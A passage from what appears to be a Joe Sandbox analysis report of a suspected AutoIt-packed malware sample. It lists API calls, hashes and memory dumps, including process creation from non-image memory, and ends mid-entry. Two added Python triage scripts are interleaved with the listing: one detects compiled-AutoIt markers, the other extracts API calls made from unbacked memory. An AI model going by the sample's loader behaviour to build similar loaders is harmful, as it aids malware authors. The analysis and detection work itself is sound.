                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CloseOpenQueryValue
                                                                        • String ID: Control Panel\Mouse
                                                                        • API String ID: 3677997916-824357125
                                                                        • Opcode ID: 68ced722cc2855472c22da6d2b73bd5ed60bea3d7c9e3c12ec7dfe9096257f3b
                                                                        • Instruction ID: b3c86c9f377ccf7a7bdcc9c41e16dc6b3fe20d5e7d1613b9604c7001a14a3fb4
                                                                        • Opcode Fuzzy Hash: 68ced722cc2855472c22da6d2b73bd5ed60bea3d7c9e3c12ec7dfe9096257f3b
                                                                        • Instruction Fuzzy Hash: 1C114871614208BFDF22DFA8DC409EEBBB8FF15744F048469E805E7210D2719F40A760
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 008CEA39
                                                                        • GetOpenFileNameW.COMDLG32(?), ref: 008CEA83
                                                                          • Part of subcall function 00894750: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00894743,?,?,?,0089715A,?,?,?,?,0089108C), ref: 00894770
                                                                          • Part of subcall function 008B0791: GetLongPathNameW.KERNELBASE(?,?,00007FFF), ref: 008B07B0
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Name$Path$FileFullLongOpen_memset
                                                                        • String ID: X
                                                                        • API String ID: 3777226403-3081909835
                                                                        • Opcode ID: 72d35d7805d161413b31a647c159956bab71b90ff78b413d191ffc13e21153e9
                                                                        • Instruction ID: 052cf663fe7c06ffb42f17e8643336fd702a2f76968ab212f91699b4a3e002f8
                                                                        • Opcode Fuzzy Hash: 72d35d7805d161413b31a647c159956bab71b90ff78b413d191ffc13e21153e9
                                                                        • Instruction Fuzzy Hash: 6521A430A142589BCF11AFD8C845BDE7BF8FF49714F044019E408E7241DBB45949CF92
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: __fread_nolock_memmove
                                                                        • String ID: EA06
                                                                        • API String ID: 1988441806-3962188686
                                                                        • Opcode ID: 876b33fff3a5085316edbf694f3449e5e5506e0624a76bed08572af255879854
                                                                        • Instruction ID: 187e12c92e3d6f871f610639f2e71e6daa326ba092c30b75cab5a61bd78dd8a3
                                                                        • Opcode Fuzzy Hash: 876b33fff3a5085316edbf694f3449e5e5506e0624a76bed08572af255879854
                                                                        • Instruction Fuzzy Hash: E601B971D0421C7EDB28DAA8CC56EFE7BF8DF15311F00459AF552D6281E975E6048B60
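The two strings recovered in the functions above, `>>>AUTOIT SCRIPT<<<` (from the directive-parsing function with the `Bad directive syntax error` string) and `EA06` (from the `__fread_nolock` resource reader), are the markers behind the "Binary is likely a compiled AutoIt script file" signature. The scanner below is an added triage example; it is not code from the Joe Sandbox report or from the AutoIt project. It assumes the AutoIt v3 compiled-script layout, in which a fixed 16-byte magic is immediately followed by the subtype tag `AU3!EA06` (the report only shows the `EA06` part), and it looks for the script marker in both ASCII and UTF-16LE because the report does not show its encoding. The input buffer is constructed, not bytes from the sample.

```python
"""Locate compiled-AutoIt markers in a binary blob.

Added triage example; it is not code from the Joe Sandbox report or from
the AutoIt project. The helper names and the sample buffer are constructed.
"""
from dataclasses import dataclass, field
from typing import List, Optional

# String recovered from the sample's directive parser (see the String IDs above).
SCRIPT_MARKER = ">>>AUTOIT SCRIPT<<<"
# The report shows only "EA06". The full subtype tag "AU3!EA06" and the
# 16-byte magic that precedes it come from the AutoIt v3 compiled-script
# layout, not from the report, and are assumptions of this example.
AU3_SUBTYPE = b"AU3!EA06"
AU3_MAGIC = bytes.fromhex("a3484bbe986c4aa9994c530a86d6487d")


@dataclass
class AutoItScan:
    header_offsets: List[int] = field(default_factory=list)   # magic immediately followed by AU3!EA06
    marker_offsets: List[int] = field(default_factory=list)   # ">>>AUTOIT SCRIPT<<<" occurrences
    marker_encoding: Optional[str] = None                     # "ascii", "utf-16-le" or None

    @property
    def is_compiled_autoit(self) -> bool:
        # The marker alone also lives in a clean AutoIt3 interpreter, so only
        # the magic/subtype pair counts as evidence of an embedded script.
        return bool(self.header_offsets)


def _find_all(haystack: bytes, needle: bytes) -> List[int]:
    """Every offset of needle in haystack, overlapping matches included."""
    hits, start = [], 0
    while True:
        idx = haystack.find(needle, start)
        if idx < 0:
            return hits
        hits.append(idx)
        start = idx + 1


def scan_autoit(data: bytes) -> AutoItScan:
    result = AutoItScan()
    for off in _find_all(data, AU3_MAGIC):
        tag = data[off + len(AU3_MAGIC): off + len(AU3_MAGIC) + len(AU3_SUBTYPE)]
        if tag == AU3_SUBTYPE:
            result.header_offsets.append(off)
    # The runtime uses the W (Unicode) APIs, so the marker may be stored as
    # UTF-16LE; the report does not show the encoding, so both are tried.
    for enc in ("ascii", "utf-16-le"):
        hits = _find_all(data, SCRIPT_MARKER.encode(enc))
        if hits:
            result.marker_offsets = hits
            result.marker_encoding = enc
            break
    return result


def build_sample() -> bytes:
    """Constructed buffer, not bytes from the analysed sample: a fake MZ/PE
    stub, the interpreter marker in UTF-16LE, filler, then a script header."""
    stub = b"MZ" + b"\x00" * 62 + b"PE\x00\x00" + b"\x90" * 200      # 268 bytes
    marker = SCRIPT_MARKER.encode("utf-16-le")                      # 38 bytes, at offset 268
    header = AU3_MAGIC + AU3_SUBTYPE + b"\x00" * 16                 # at 268 + 38 + 100 = 406
    return stub + marker + b"\xcc" * 100 + header + b"\x00" * 32


if __name__ == "__main__":
    scan = scan_autoit(build_sample())
    print(scan.is_compiled_autoit, scan.header_offsets, scan.marker_offsets, scan.marker_encoding)
```

Run it over a real file with `scan_autoit(open(path, "rb").read())`; the `marker_*` fields tell you the binary contains the AutoIt interpreter, while `header_offsets` tells you where an embedded script starts, which is the offset to hand to an AutoIt decompiler.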
                                                                        APIs
                                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 014FFA4D
                                                                        • ExitProcess.KERNEL32(00000000), ref: 014FFA6C
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2155642565.00000000014FE000.00000040.00000020.00020000.00000000.sdmp, Offset: 014FE000, based on PE: false
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_14fe000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Process$CreateExit
                                                                        • String ID: D
                                                                        • API String ID: 126409537-2746444292
                                                                        • Opcode ID: 145b7a1cfb31929a6d02ccf2d0a45045f2bdb13625618a76059d23da88a780f4
                                                                        • Instruction ID: b237198fcaf73db815df176e0540346a4c5af254930d83dc214299ae3a3a960e
                                                                        • Opcode Fuzzy Hash: 145b7a1cfb31929a6d02ccf2d0a45045f2bdb13625618a76059d23da88a780f4
                                                                        • Instruction Fuzzy Hash: 34F0EC7294024DABDB60EFE0CC49FEE777CBF44701F448509FB1A9A284DA7496088B61
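The `CreateFileW` function earlier and the `CreateProcessW`/`ExitProcess` function just above both live in the dump `...014FE000...` marked `based on PE: false`, that is, in memory not backed by an image on disk, while the AutoIt runtime functions sit in the `0x890000` image. When triaging a long listing like this one, the functions worth reading first are exactly those: API calls made from non-image memory. The parser below is an added example, not part of the report or of Joe Sandbox; it handles only the textual layout visible on this page (`• API.Module(args), ref: ADDR` lines, `• Part of subcall function ...` lines, and `• Source File: ..., Offset: ..., based on PE: true|false` lines). The sample text is copied from the entries above.

```python
"""Pull API calls made from non-image memory out of a Joe Sandbox function listing.

Added example, not code from the report or from Joe Sandbox. It relies only on
the text layout visible on this page; field names below are this example's own.
"""
import re
from dataclasses import dataclass
from typing import Dict, List

# "• CreateProcessW.KERNELBASE(?,00000000), ref: 014FFA4D" or "• _memset.LIBCMT ref: 008940FC"
API_RE = re.compile(
    r"^\s*•\s*(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>.*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]{8})\s*$"
)
# Calls attributed to a callee are listed under that callee's own function; skip them here.
SUBCALL_RE = re.compile(r"^\s*•\s*Part of subcall function")
SOURCE_RE = re.compile(
    r"^\s*•\s*Source File:\s*(?P<dump>\S+),\s*Offset:\s*(?P<offset>[0-9A-Fa-f]{8}),\s*based on PE:\s*(?P<pe>true|false)"
)


@dataclass
class FunctionEntry:
    apis: List[dict]      # {"api", "module", "args", "ref"} per direct call
    dump: str             # memory dump the function was lifted from
    offset: int           # base of that dump
    pe_backed: bool       # False means the code is not backed by an image on disk


def parse_functions(text: str) -> List[FunctionEntry]:
    """One FunctionEntry per 'Source File' line, owning the API lines that preceded it."""
    entries: List[FunctionEntry] = []
    pending: List[dict] = []
    for line in text.splitlines():
        if SUBCALL_RE.match(line):
            continue
        m = API_RE.match(line)
        if m:
            args = [a.strip() for a in m["args"].split(",")] if m["args"] is not None else []
            pending.append({"api": m["api"], "module": m["module"], "args": args, "ref": int(m["ref"], 16)})
            continue
        m = SOURCE_RE.match(line)
        if m:
            entries.append(FunctionEntry(apis=pending, dump=m["dump"], offset=int(m["offset"], 16),
                                         pe_backed=(m["pe"] == "true")))
            pending = []
    return entries


def apis_from_non_image_memory(entries: List[FunctionEntry]) -> Dict[str, List[str]]:
    """Map each non-PE-backed dump to the sorted set of APIs called from it."""
    out: Dict[str, set] = {}
    for e in entries:
        if not e.pe_backed:
            out.setdefault(e.dump, set()).update(a["api"] for a in e.apis)
    return {dump: sorted(apis) for dump, apis in out.items()}


# Constructed input: three function entries copied from this report, indentation removed.
SAMPLE_REPORT = """\
APIs
  • Part of subcall function 01500CB8: Sleep.KERNELBASE(000001F4), ref: 01500CC9
• CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 01500ED4
Strings
Memory Dump Source
• Source File: 00000000.00000002.2155642565.00000000014FE000.00000040.00000020.00020000.00000000.sdmp, Offset: 014FE000, based on PE: false
APIs
• CreateProcessW.KERNELBASE(?,00000000), ref: 014FFA4D
• ExitProcess.KERNEL32(00000000), ref: 014FFA6C
Strings
Memory Dump Source
• Source File: 00000000.00000002.2155642565.00000000014FE000.00000040.00000020.00020000.00000000.sdmp, Offset: 014FE000, based on PE: false
APIs
• GetTempPathW.KERNEL32(00000104,?), ref: 008F98F8
• GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 008F990F
Strings
Memory Dump Source
• Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
"""

if __name__ == "__main__":
    for dump, apis in apis_from_non_image_memory(parse_functions(SAMPLE_REPORT)).items():
        print(dump, "->", ", ".join(apis))
```

On this report the result is a single non-image dump at `014FE000` calling `CreateFileW`, `CreateProcessW` and `ExitProcess`, which is the stage to pull out of the sandbox and disassemble, while the image-backed `GetTempPathW`/`GetTempFileNameW` pair is ordinary AutoIt runtime behaviour.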
                                                                        APIs
                                                                        • GetTempPathW.KERNEL32(00000104,?), ref: 008F98F8
                                                                        • GetTempFileNameW.KERNELBASE(?,aut,00000000,?), ref: 008F990F
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Temp$FileNamePath
                                                                        • String ID: aut
                                                                        • API String ID: 3285503233-3010740371
                                                                        • Opcode ID: 0eae07640cfb7637dae6b6f211b1e9f83315bce419137c1878c0398ea56cc5a5
                                                                        • Instruction ID: 9d04234e237baf338ab5c036abb60326a3213fad92b368369be6b31d30cdb9e9
                                                                        • Opcode Fuzzy Hash: 0eae07640cfb7637dae6b6f211b1e9f83315bce419137c1878c0398ea56cc5a5
                                                                        • Instruction Fuzzy Hash: 02D05E7964430DABDB50DBA0DC0EFDA777CE704704F0046B1BA64921A1EAB09598DB91
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID:
                                                                        • API String ID:
                                                                        • Opcode ID: 5d6e93e58661ed844a951b19faf7531256c6597fcae50ff2fa38645e64bbcdcd
                                                                        • Instruction ID: 52070e1234653c0376a58dec588c86d2fc61445c6efcda01e94a9884bb9f82f6
                                                                        • Opcode Fuzzy Hash: 5d6e93e58661ed844a951b19faf7531256c6597fcae50ff2fa38645e64bbcdcd
                                                                        • Instruction Fuzzy Hash: FBF138B16083059FCB14DF28C480A6ABBE5FF89314F54892EF9999B391D730E945CF82
                                                                        APIs
                                                                          • Part of subcall function 008B0162: MapVirtualKeyW.USER32(0000005B,00000000), ref: 008B0193
                                                                          • Part of subcall function 008B0162: MapVirtualKeyW.USER32(00000010,00000000), ref: 008B019B
                                                                          • Part of subcall function 008B0162: MapVirtualKeyW.USER32(000000A0,00000000), ref: 008B01A6
                                                                          • Part of subcall function 008B0162: MapVirtualKeyW.USER32(000000A1,00000000), ref: 008B01B1
                                                                          • Part of subcall function 008B0162: MapVirtualKeyW.USER32(00000011,00000000), ref: 008B01B9
                                                                          • Part of subcall function 008B0162: MapVirtualKeyW.USER32(00000012,00000000), ref: 008B01C1
                                                                          • Part of subcall function 008A60F9: RegisterWindowMessageW.USER32(WM_GETCONTROLNAME,?,0089F930), ref: 008A6154
                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 0089F9CD
                                                                        • OleInitialize.OLE32(00000000), ref: 0089FA4A
                                                                        • CloseHandle.KERNEL32(00000000), ref: 008D45C8
                                                                        Similarity
                                                                        • API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
                                                                        • String ID:
                                                                        • API String ID: 1986988660-0
                                                                        • Opcode ID: ae9541c9a2dd833dfe78e3973160cda63e0c7c6b22079f36a776231d82f327a5
                                                                        • Instruction ID: 43b1f11f4612261e1d2b0249f0a862b9c447e2992d1a639224ace4ddaafe66d3
                                                                        • Opcode Fuzzy Hash: ae9541c9a2dd833dfe78e3973160cda63e0c7c6b22079f36a776231d82f327a5
                                                                        • Instruction Fuzzy Hash: 6281ACB0939B40CFC794EF2BA8606297BE5FB98307756812AE419CB273E7705485EF11
                                                                        APIs
                                                                        Similarity
                                                                        • API ID: __flush__write_memmove
                                                                        • String ID:
                                                                        • API String ID: 1671952623-0
                                                                        • Opcode ID: 7daaa5fb134a0f107b23d303f52d9efec4bb6e2f4a99a956fa65b4d1c1be2b21
                                                                        • Instruction ID: 67247a719c2a37b4dc850d1de2da096eabf94bc40bdce8266c816ef584939047
                                                                        • Opcode Fuzzy Hash: 7daaa5fb134a0f107b23d303f52d9efec4bb6e2f4a99a956fa65b4d1c1be2b21
                                                                        • Instruction Fuzzy Hash: F2218374B0060E9BDB188E69C8824EE77B6FF41354B24D57DE859C6742EB30DD41CA45
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 00894370
                                                                        • Shell_NotifyIconW.SHELL32(00000000,?), ref: 00894415
                                                                        • Shell_NotifyIconW.SHELL32(00000001,?), ref: 00894432
                                                                        Similarity
                                                                        • API ID: IconNotifyShell_$_memset
                                                                        • String ID:
                                                                        • API String ID: 1505330794-0
                                                                        • Opcode ID: a641c894db63b7b063babd7583e1991329d5fca922972f3227673e33bdc395d8
                                                                        • Instruction ID: daee0dfcbb51eea4fda3f40d342e9e9d4bd10f55bdeb49f8e2651ea39f95aaad
                                                                        • Opcode Fuzzy Hash: a641c894db63b7b063babd7583e1991329d5fca922972f3227673e33bdc395d8
                                                                        • Instruction Fuzzy Hash: A831C3705197019FDB20EF34D884A9BBBF8FB48309F04092EE69AC2351D771A945DB52
                                                                        APIs
                                                                        • __FF_MSGBANNER.LIBCMT ref: 008B5733
                                                                          • Part of subcall function 008BA16B: __NMSG_WRITE.LIBCMT ref: 008BA192
                                                                          • Part of subcall function 008BA16B: __NMSG_WRITE.LIBCMT ref: 008BA19C
                                                                        • __NMSG_WRITE.LIBCMT ref: 008B573A
                                                                          • Part of subcall function 008BA1C8: GetModuleFileNameW.KERNEL32(00000000,009533BA,00000104,?,00000001,00000000), ref: 008BA25A
                                                                          • Part of subcall function 008BA1C8: ___crtMessageBoxW.LIBCMT ref: 008BA308
                                                                          • Part of subcall function 008B309F: ___crtCorExitProcess.LIBCMT ref: 008B30A5
                                                                          • Part of subcall function 008B309F: ExitProcess.KERNEL32 ref: 008B30AE
                                                                          • Part of subcall function 008B8B28: __getptd_noexit.LIBCMT ref: 008B8B28
                                                                        • RtlAllocateHeap.NTDLL(014B0000,00000000,00000001,00000000,?,?,?,008B0DD3,?), ref: 008B575F
                                                                        Similarity
                                                                        • API ID: ExitProcess___crt$AllocateFileHeapMessageModuleName__getptd_noexit
                                                                        • String ID:
                                                                        • API String ID: 1372826849-0
                                                                        • Opcode ID: 965cf6abd1d68fbe1bd21e0fb85090e981855db307a6b81e43600d03efda1f79
                                                                        • Instruction ID: 0163f0ba77d4e8d54fcccf80ab864dc57c6cac67af3620c1b1cc97a14c005901
                                                                        • Opcode Fuzzy Hash: 965cf6abd1d68fbe1bd21e0fb85090e981855db307a6b81e43600d03efda1f79
                                                                        • Instruction Fuzzy Hash: 7C01F135304B05EAD6112B7DEC82BEE778CFF82362F500525F505DA382DEB09C00976A
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(?,40000000,00000001,00000000,00000003,00000080,00000000,?,?,008F9548,?,?,?,?,?,00000004), ref: 008F98BB
                                                                        • SetFileTime.KERNELBASE(00000000,?,00000000,?,?,008F9548,?,?,?,?,?,00000004,00000001,?,?,00000004), ref: 008F98D1
                                                                        • CloseHandle.KERNEL32(00000000,?,008F9548,?,?,?,?,?,00000004,00000001,?,?,00000004,00000001,?,?), ref: 008F98D8
                                                                        Similarity
                                                                        • API ID: File$CloseCreateHandleTime
                                                                        • String ID:
                                                                        • API String ID: 3397143404-0
                                                                        • Opcode ID: e324cbcec56ff1bdcde66ba4540efac1fc259cff59ae32e0297c2e7c6ead6a1e
                                                                        • Instruction ID: 7a0b00653f53a2ed8cb08dff61db865931086492c96bc45c1661539bfb59185b
                                                                        • Opcode Fuzzy Hash: e324cbcec56ff1bdcde66ba4540efac1fc259cff59ae32e0297c2e7c6ead6a1e
                                                                        • Instruction Fuzzy Hash: E8E0863229461CB7E7211B64EC09FDA7B19EB067A0F108220FB64A90E0C7B12511E798
                                                                        APIs
                                                                        • _free.LIBCMT ref: 008F8D1B
                                                                          • Part of subcall function 008B2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,008B9A24), ref: 008B2D69
                                                                          • Part of subcall function 008B2D55: GetLastError.KERNEL32(00000000,?,008B9A24), ref: 008B2D7B
                                                                        • _free.LIBCMT ref: 008F8D2C
                                                                        • _free.LIBCMT ref: 008F8D3E
                                                                        Similarity
                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                        • String ID:
                                                                        • API String ID: 776569668-0
                                                                        • Opcode ID: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                        • Instruction ID: 7750af1a74db30a00b3798966172c70be7405e98a904161c45f0289477050d88
                                                                        • Opcode Fuzzy Hash: 625e2a9df38ff8793e00647abbe9ccf0d6414545c555b0c4696158d27d9f7751
                                                                        • Instruction Fuzzy Hash: 59E012A161260986DB24B57CA940AE713DCEF58352718091DB50DD7286CE64F8428134
                                                                        Strings
                                                                        Similarity
                                                                        • API ID:
                                                                        • String ID: CALL
                                                                        • API String ID: 0-4196123274
                                                                        • Opcode ID: f1eebd6b2be8d21658c322eb2100aee69ea79ea0ee44657e828feabd4c3653af
                                                                        • Instruction ID: 1bf07c9f37d7ba5d443126598b257a5ccac1e5adc4fefc909c8acd5c83bfdaa1
                                                                        • Opcode Fuzzy Hash: f1eebd6b2be8d21658c322eb2100aee69ea79ea0ee44657e828feabd4c3653af
                                                                        • Instruction Fuzzy Hash: D5224A70508205DFDB28EF18C490A6AB7E1FF85314F19896DE98ADB362D731EC45CB82
                                                                        APIs
                                                                        Strings
                                                                        Similarity
                                                                        • API ID: _memmove
                                                                        • String ID: EA06
                                                                        • API String ID: 4104443479-3962188686
                                                                        • Opcode ID: 68bd21922a639b3671ceb079bd9df6cb55b5a9c0c84a6ceb0b153bf9051b1c27
                                                                        • Instruction ID: 6bb1205392ff21a5354bffa8529057e3a3d3032b0c1af6a1ad5e6a83aaa7f110
                                                                        • Opcode Fuzzy Hash: 68bd21922a639b3671ceb079bd9df6cb55b5a9c0c84a6ceb0b153bf9051b1c27
                                                                        • Instruction Fuzzy Hash: C4416B25A0425C5BDF25BB688C51FBE7BA2FB45304F2C6574FC82DB282D6349D4683A2
                                                                        APIs
                                                                        • IsThemeActive.UXTHEME ref: 00894834
                                                                          • Part of subcall function 008B336C: __lock.LIBCMT ref: 008B3372
                                                                          • Part of subcall function 008B336C: DecodePointer.KERNEL32(00000001,?,00894849,008E7C74), ref: 008B337E
                                                                          • Part of subcall function 008B336C: EncodePointer.KERNEL32(?,?,00894849,008E7C74), ref: 008B3389
                                                                          • Part of subcall function 008948FD: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00894915
                                                                          • Part of subcall function 008948FD: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 0089492A
                                                                          • Part of subcall function 00893B3A: GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00893B68
                                                                          • Part of subcall function 00893B3A: IsDebuggerPresent.KERNEL32(?,?), ref: 00893B7A
                                                                          • Part of subcall function 00893B3A: GetFullPathNameW.KERNEL32(00007FFF,?,?,009552F8,009552E0,?,?), ref: 00893BEB
                                                                          • Part of subcall function 00893B3A: SetCurrentDirectoryW.KERNEL32(?), ref: 00893C6F
                                                                        • SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00894874
                                                                        Similarity
                                                                        • API ID: InfoParametersSystem$CurrentDirectoryPointer$ActiveDebuggerDecodeEncodeFullNamePathPresentTheme__lock
                                                                        • String ID:
                                                                        • API String ID: 1438897964-0
                                                                        • Opcode ID: 81c29779fe29fdc1d5abb876fb25c7c1b006b0b19596ecd12cf349ca9e16fd38
                                                                        • Instruction ID: 438ecda5971604d1d0f2138ef2b251a5f39648d9a2882c9e61f06e2753b1405c
                                                                        • Opcode Fuzzy Hash: 81c29779fe29fdc1d5abb876fb25c7c1b006b0b19596ecd12cf349ca9e16fd38
                                                                        • Instruction Fuzzy Hash: 43119D719283459BCB00EF2AEC0594EBBE8FF89750F14452EF494D32B2DB709645DB92
                                                                        APIs
                                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000,?,00895821,?,?,?,?), ref: 00895CC7
                                                                        • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000000,?,00895821,?,?,?,?), ref: 008CDD73
                                                                        Similarity
                                                                        • API ID: CreateFile
                                                                        • String ID:
                                                                        • API String ID: 823142352-0
                                                                        • Opcode ID: 6ed574946b9f15b0425b969f199459fb27fc7d534383bf7ed263097f4524a36f
                                                                        • Instruction ID: 1e49ff343c0697601f0b9151ac2d59457392c9c43bdbb2894259ecba15a05ce4
                                                                        • Opcode Fuzzy Hash: 6ed574946b9f15b0425b969f199459fb27fc7d534383bf7ed263097f4524a36f
                                                                        • Instruction Fuzzy Hash: 90016D70284708BEF6212E24CC8AFA63ADCFB0176CF148319BAE59A1E0C6B45C488B54
                                                                        APIs
                                                                          • Part of subcall function 008B571C: __FF_MSGBANNER.LIBCMT ref: 008B5733
                                                                          • Part of subcall function 008B571C: __NMSG_WRITE.LIBCMT ref: 008B573A
                                                                          • Part of subcall function 008B571C: RtlAllocateHeap.NTDLL(014B0000,00000000,00000001,00000000,?,?,?,008B0DD3,?), ref: 008B575F
                                                                        • std::exception::exception.LIBCMT ref: 008B0DEC
                                                                        • __CxxThrowException@8.LIBCMT ref: 008B0E01
                                                                          • Part of subcall function 008B859B: RaiseException.KERNEL32(?,?,?,00949E78,00000000,?,?,?,?,008B0E06,?,00949E78,?,00000001), ref: 008B85F0
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: AllocateExceptionException@8HeapRaiseThrowstd::exception::exception
                                                                        • String ID:
                                                                        • API String ID: 3902256705-0
                                                                        • Opcode ID: 0721ae83babed67960135a53cdd8c657942baae484500fd6e6785e1f8b121a72
                                                                        • Instruction ID: 4406fa538590f3f52fa124ddfb50f92b0408abaf994343355a40acebb8e21299
                                                                        • Opcode Fuzzy Hash: 0721ae83babed67960135a53cdd8c657942baae484500fd6e6785e1f8b121a72
                                                                        • Instruction Fuzzy Hash: 2BF0813150431DA6CB20AB98EC059DF77ACFF01351F540569F904E6381DF709A80CA96
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmp
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmp
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: __lock_file_memset
                                                                        • String ID:
                                                                        • API String ID: 26237723-0
                                                                        • Opcode ID: 339294a327941b7572b27457c9b7ee7bef315876c0abc0f50fd3a0adc70034c0
                                                                        • Instruction ID: 7a047bcc68e8f2a1e2b4765bc19034f8e3cd7ae421d630836a096cb19d240ce2
